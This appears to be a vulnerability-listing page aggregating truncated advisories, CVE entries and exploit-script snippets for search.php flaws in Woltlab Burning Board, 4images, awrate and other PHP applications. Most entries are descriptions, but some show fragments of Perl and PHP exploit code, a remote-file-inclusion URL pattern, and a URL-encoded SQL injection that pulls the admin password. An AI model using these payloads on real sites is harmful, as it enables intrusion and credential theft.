Woltlab Burning Board Search.PHP SQL注入漏洞

Woltlab Burning Board是一款基于PHP的WEB应用程序。 Woltlab Burning Board不正确过滤用户提交的输入，远程攻击者可以利用漏洞进行SQL注入攻击，获得敏感信息。 问题是'Search.PHP'脚本对用户提交的WEB参数缺少过滤，提交恶意脚本代码作为参数数据，可导致获得敏感信息。 Woltlab Woltlab Burning Board Lite 1.0.2 WoltLab Burning Board Lite 1.0.2 WoltLab Burning Board Lite 1.0.1 e WoltLab Burning Board Lite...

Burning Board search.php boardids Parameter SQL Injection

Binary data 3888.prm...

Woltlab Burning Board 1.0.22.3.6 - search.php SQL Injection (2)

Woltlab Burning Board 1.0.22.3.6 - search.php SQL Injection 2 !/usr/bin/perl Woltlab Burning Board 2.X/Lite search.php SQL Injection exploit - burned.pl written by trew should work on every wbb regardless of php settings. v 1.2 - added 1337 sql filter evasion, version identification,better...

vulnerability script indexu all versions

vulnerability script indexu all versions Found by :SwEET-DeViL & viP HaCkEr & HaCkEr sUn TeaM AL-GaRNi Application : indexu version : all versions URL : http://www.nicecoder.com/ google : "Powered by INDEXU 5." Exploits : |//1| in upgrade.php...

Woltlab Burning Board 1.0.2/2.3.6 - 'search.php' SQL Injection (2)

!/usr/bin/perl Woltlab Burning Board 2.X/Lite search.php SQL Injection exploit - burned.pl written by trew should work on every wbb regardless of php settings. v 1.2 - added 1337 sql filter evasion, version identification,better regex,raw cookie v 1.1 - added wbblite support thx to lama !PRIVATE!...

Woltlab Burning Board 1.0.2/2.3.6 - 'search.php' SQL Injection (1)

?php / http://www.undergroundagents.de coded by silent vapor [email protected] / printr' -------------------------------------------------------------------------------- Woltlab Burning Board Lite = 1.0.2 GetHashes over search.php Woltlab Burning Board = 2.3.6 GetHashes over search.p...

Woltlab Burning Board 1.0.2/2.3.6 - 'search.php' SQL Injection (3)

!/usr/bin/perl use LWP::UserAgent; use HTTP::Response; $| = 1; print " Woltlab Burning Board 2.3.6 Bug by trew \n"; if$ARGV Exploiting...\n"; my $url = shift; my $id = shift; my $sstring = shift; my $ua = LWP::UserAgent-new; my $request = new HTTP::Request'POST', 'http://'.$url.'search.php';...

fcCMS10-xss.txt

Fix & Chips CMS v1.0 http://software.fixnchipsit.com/ Vulnerable files: staff.php delete-announce.php new-customer.php search.php client-results.php -------------------------------------------- staff.php XSS User input in the Announcement box isn't properly sanatized before being generated. A few...

Cross site scripting

Multiple cross-site scripting XSS vulnerabilities in Fix and Chips CMS 1.0 allow remote attackers to inject arbitrary web script or HTML via the 1 id parameter in a delete-announce.php; the 2 Announcement form field in b staff.php; the 3 Client Name, 4 Business Name, 5 Street, 6 Address 2, 7...

CVE-2007-0146

Multiple cross-site scripting XSS vulnerabilities in Fix and Chips CMS 1.0 allow remote attackers to inject arbitrary web script or HTML via the 1 id parameter in a delete-announce.php; the 2 Announcement form field in b staff.php; the 3 Client Name, 4 Business Name, 5 Street, 6 Address 2, 7...

CVE-2006-4575

Multiple SQL injection vulnerabilities in The Address Book 1.04e allow remote attackers to execute arbitrary SQL commands via the 1 lastname, 2 firstname, 3 passwordOld, 4 passwordNew, 5 id, 6 language, 7 defaultLetter, 8 newuserPass, 9 newuserType, 10 newuserEmail parameters in a user.php; the 1...

CVE-2006-4577

CVE-2006-4577 affects The Address Book 1.04e. It contains multiple cross-site scripting (XSS) vulnerabilities allowing an attacker to inject arbitrary scripts via: (1) email, (2) websites, (3) groupAddName in save.php; (4) errorMsg in index.php; (5) goTo and (6) search in search.php. CVSS v2 base...

CVE-2006-4577

Multiple cross-site scripting XSS vulnerabilities in The Address Book 1.04e allow remote attackers to inject arbitrary web script or HTML via Javascript events in the 1 email, 2 websites, and 3 groupAddName parameters in a save.php; the 4 errorMsg parameter in b index.php; and the 5 goTo and 6...

CVE-2006-4575

Multiple SQL injection vulnerabilities in The Address Book 1.04e allow remote attackers to execute arbitrary SQL commands via the 1 lastname, 2 firstname, 3 passwordOld, 4 passwordNew, 5 id, 6 language, 7 defaultLetter, 8 newuserPass, 9 newuserType, 10 newuserEmail parameters in a user.php; the 1...

CVE-2006-4577

Multiple cross-site scripting XSS vulnerabilities in The Address Book 1.04e allow remote attackers to inject arbitrary web script or HTML via Javascript events in the 1 email, 2 websites, and 3 groupAddName parameters in a save.php; the 4 errorMsg parameter in b index.php; and the 5 goTo and 6...

awrate.com Message Board 1.0 - 'search.php' Remote File Inclusion

!/usr/bin/perl Portal Name : awrate 1.0search.php Remote File Inclusion Exploit BUG: http://target/Path/search.php?toroot=http Vulnerable Code: includeonce"$toroot../commonphp/table.php.inc";; Bug Found DeltahackingTEAM Code :Dr.Trojan&Dr.Pantagon Download...

awrate.com Message Board 1.0 - search.php Remote File Inclusion

awrate.com Message Board 1.0 - search.php Remote File Inclusion !/usr/bin/perl Portal Name : awrate 1.0search.php Remote File Inclusion Exploit BUG: http://target/Path/search.php?toroot=http Vulnerable Code: includeonce"$toroot../commonphp/table.php.inc";; Bug Found DeltahackingTEAM Code...

CVE-2006-5236

SQL injection vulnerability in search.php in 4images 1.7.x allows remote authenticated users to execute arbitrary SQL commands via the searchuser parameter...

CVE-2006-5236

CVE-2006-5236 is an SQL injection in 4images 1.7.x, exploitable via the search_user parameter in search.php. The vulnerability allows remote authenticated users to execute arbitrary SQL commands through that parameter. A PT-Security advisory for 4Images confirms affected versions (1.7.x) and reco...

4Images 1.7.x - 'search.php' SQL Injection

!/usr/bin/php //search.php?searchuser=x%2527%20union%20select%20userpassword%20from%204imagesusers%20where%20username=%2527ADMIN w4ck1ng - w4ck1ng.com / if!$argv3 die"Usage: php $argv0 host path options table prefix user id\n Options: -d: Determine table prefix\n Example: php $argv0 domain.com...